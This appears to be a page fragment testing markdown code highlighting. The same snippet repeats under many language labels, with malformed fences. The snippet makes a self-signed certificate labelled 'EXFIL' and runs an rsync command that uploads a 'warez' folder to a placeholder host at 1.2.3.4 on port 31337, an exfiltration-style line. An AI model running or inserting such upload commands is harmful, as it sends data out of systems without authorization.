openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
sql
|
||||
```sql
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
stylus
|
||||
```stylus
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
tcl
|
||||
```tcl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
tex
|
||||
```tex
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
text
|
||||
```text
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
textile
|
||||
```textile
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
toml
|
||||
```toml
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
twig
|
||||
```twig
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
typescript
|
||||
```typescript
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
vala
|
||||
```vala
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
velocity
|
||||
```velocity
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
verilog
|
||||
```verilog
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
vhdl
|
||||
```vhdl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
xml
|
||||
```xml
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
xquery
|
||||
```xquery
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
yaml
|
||||
```yaml
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user